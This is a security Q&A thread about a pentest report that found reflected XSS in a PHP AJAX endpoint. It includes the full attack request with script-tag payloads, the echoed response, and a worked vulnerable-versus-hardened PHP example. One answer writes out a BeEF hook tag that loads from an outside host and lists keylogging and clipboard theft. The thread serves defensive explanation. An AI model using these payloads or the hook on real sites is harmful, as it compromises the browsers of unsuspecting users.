
We got a security review done of our PHP code and the security company sent this in their report:

Request

GET /appdir/ajax/addAvail.php?counter=1216%3cscript%3ealert(0)%3c%2fscript%3e&from=1216%3cscript%3ealert(0)%3c%2fscript%3e&to=1216%3cscript%3ealert(0)%3c%2fscript%3e&day=1216%3cscript%3ealert(0)%3c%2fscript%3e&parentDiv=1216%3cscript%3ealert(0)%3c%2fscript%3e&type=1216%3cscript%3ealert(0)%3c%2fscript%3e&date=1216%3cscript%3ealert(0)%3c%2fscript%3e&showdate=1216%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1
Host: localhost 
Proxy-Connection: keep-alive 
User-Agent: x 
Content-Length: 0 
Cache-Control: max-age=0 
Origin: null 
Accept: text/html 
Accept-Language: en-US,en;q=0.8 
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 

Response

HTTP/1.1 200 OK 
Date: Fri, 17 Dec 2010 00:46:48 GMT 
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 
X-Powered-By: PHP/5.3.1 
Set-Cookie: PHPSESSID=q832q9c0ftdsat8r55dg32taf7; path=/ 
Expires: Thu, 19 Nov 1981 08:52:00 GMT 
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 
Pragma: no-cache 
Content-Length: 928 
Content-Type: text/html 
<div class="time_row" id="days_time_container1216<script>alert(0)</script>"> 
<div class="day_holder">1216<script>alert(0)</script></div> 
<div class="time_holder">1216<script>alert(0)</script> <span>-</span> 1216<script>alert(0)</script></div> 
<div class="button_holder"><a href="javascript:void(0);" onClick="removeElement('1216<script>alert(0)</script>','days_time_container1216<script>alert(0)</script>','decrementDays')" class="link4">Remove</a></div> 
<div class="clear"></div> 
<input type="hidden" id="hday1216<script>alert(0)</script>" name="hday1216<script>alert(0)</script>" value="1216<script>alert(0)</script>"> 

<input type="hidden" id="hfrom11216<script>alert(0)</script>" name="hfrom11216<script>alert(0)</script>" value="1216<script>alert(0)</script>"> 
<input type="hidden" id="hto11216<script>alert(0)</script>" name="hto11216<script>alert(0)</script>" value="1216<script>alert(0)</script>"> 
</div>

If I directly access the script through Firefox (headers reported by Firebug):

/appdir/ajax/addAvail.php

HTTP/1.1 200 OK
Date: Sat, 25 Dec 2010 03:30:54 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache, no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 253
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<div class="time_row" id="days_time_container">
<div class="day_holder"></div>
<div class="time_holder">   <span>-</span>   </div>
<div class="button_holder"><a href="javascript:void(0);" onClick="removeElement('','days_time_container','decrementDays')" class="link4">Remove</a></div>
<div class="clear"></div>
<input type="hidden" id="hday" name="hday" value="">

<input type="hidden" id="hfrom1" name="hfrom1" value="">
<input type="hidden" id="hto1" name="hto1" value="">
</div>

I'm trying to understand why this might be problematic. I will, of course, ask the security company, but I'm also trying to evaluate them and see what the community has to say before they give me some roundabout answer.

Also, this is related to Security review: "HTTP header user-agent has been set to (something)" in the sense that both these issues were identified in the same report.

siliconpi
    A question, did they test the same site - and version - as the one you were browsing to? Not only did their exploit not show up - the versions of everything are different. PHP v5.3.2 vs. 5.3.1, everything else too... And the OS is not even the same! – AviD Dec 25 '10 at 23:05
  • Hi @AviD - good observation, they put their own test site which is different from what I used. – siliconpi Dec 28 '10 at 08:10
  • 3
    Well duh, that seems kinda pointless, doncha think? *Of course* the results are gonna be different, that's why you don't see the exploit when you tried it on your system. I would go so far as to say the PT they did is nearly worthless... Clueless at best, negligent at worst. – AviD Dec 28 '10 at 09:00



XSS can be very dangerous in many ways.

For example, if I inject the following bit of XSS into your code, all clients viewing this code with JavaScript enabled would become a zombie in my BeEF framework (Browser Exploitation Framework):

<script src='http://10.0.0.100/beef/hook/beefmagic.js.php'></script>

Once anyone browses a page with that script inclusion in it, the framework automatically lets me know and basically lets me very easily choose from a toolbox of nasty stuff. To name some, all of which can be set to autorun when a new zombie registers:

  • Browser exploitation modules (even integrated with Metasploit)
  • Metasploit autopwn (yepp.. one click one pwn)
  • Port scanning LAN
  • Tor detection
  • Keylogging
  • See what the user sees functionality
  • Visited pages bruteforcing
  • Clipboard theft
  • Detect plugins

XSS can indeed be very dangerous!

UPDATE: In your specific situation it looks to me like you're looking at a non-persistent XSS vulnerability. This means that in order for this exploit to affect other users, the attackers would have to distribute the URL to unsuspecting victims for them to load it. This is, however, not an uncommon sight.

Chris Dale
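To make the report concrete from the defender's side, here is an added example (not code from the report or from the asker's application): an assumed reconstruction of what addAvail.php does with its query string, beside a hardened version. The function names, the exact markup, and which parameter feeds the first removeElement() argument are assumptions; it needs PHP 7.4+ for arrow functions.

```php
<?php
// Added example, not the asker's code: an assumed reconstruction of addAvail.php
// (render_row_vulnerable) next to a hardened version (render_row_safe).

// Vulnerable: every parameter is concatenated raw into three different contexts:
// element text, an attribute value, and a JavaScript string literal inside onClick.
function render_row_vulnerable(array $q): string {
    $c = $q['counter'] ?? '';
    return '<div class="time_row" id="days_time_container' . $c . '">'
         . '<div class="day_holder">' . ($q['day'] ?? '') . '</div>'
         . '<div class="time_holder">' . ($q['from'] ?? '') . ' <span>-</span> ' . ($q['to'] ?? '') . '</div>'
         . '<div class="button_holder"><a href="javascript:void(0);" onClick="removeElement(\''
         . ($q['date'] ?? '') . '\',\'days_time_container' . $c . '\',\'decrementDays\')" class="link4">Remove</a></div>'
         . '</div>';
}

// Hardened: whitelist what has a known shape, encode the rest for the exact context it lands in.
function render_row_safe(array $q): string {
    // counter only ever appears as an id suffix and inside a JS string; it must be a plain integer.
    if (!isset($q['counter']) || !ctype_digit((string) $q['counter'])) {
        http_response_code(400);
        return '';
    }
    $c = (int) $q['counter'];
    // HTML text and attribute context.
    $h = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    // JS string literal inside an HTML attribute: JSON-encode first (escapes quotes, <, >, &),
    // then HTML-encode, because the HTML parser decodes the attribute before the JS engine sees it.
    $js = fn(string $s): string => $h(json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT) ?: '""');
    return '<div class="time_row" id="days_time_container' . $c . '">'
         . '<div class="day_holder">' . $h($q['day'] ?? '') . '</div>'
         . '<div class="time_holder">' . $h($q['from'] ?? '') . ' <span>-</span> ' . $h($q['to'] ?? '') . '</div>'
         . '<div class="button_holder"><a href="javascript:void(0);" onClick="removeElement('
         . $js($q['date'] ?? '') . ',\'days_time_container' . $c . '\',\'decrementDays\')" class="link4">Remove</a></div>'
         . '</div>';
}

// Constructed input mirroring the probe value used in the report.
$probe = array_fill_keys(['counter', 'day', 'from', 'to', 'date'], '1216<script>alert(0)</script>');
echo render_row_vulnerable($probe), "\n"; // the raw <script> tag comes back, exactly as in the report
echo render_row_safe($probe), "\n";       // empty body with a 400: counter is not all digits
// Legitimate-looking values containing quotes survive, but cannot break out of their context.
echo render_row_safe(['counter' => '1216', 'day' => 'Fri <17>', 'from' => '9"', 'to' => "17'", 'date' => "2010-12-17'"]), "\n";
```

The point of the two encoders is that one escaping routine is not enough: a value that lands inside the onClick string needs JavaScript-string escaping and then HTML-attribute escaping, in that order, while the numeric counter is best validated rather than encoded.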

This is a classic XSS vulnerability. The danger here is that an outside attacker could inject random code into the page. If this page displays in an elevated privilege context, it is essentially equal to the attacker having control over the user's browser when accessing this page, thus the attacker will be able to perform any action that the user is able to perform. For example, if it's an e-commerce site, the attacker would be able to simulate the user buying something, even if the user did not intend to buy anything. You can imagine how bad it can be.

Since there are many ways to direct somebody to load a certain URL - both open ("click this link to get tons of free stuff!") and covert (hidden frames, etc.) - having such a thing on the site is very dangerous.

Mark Davidson
StasM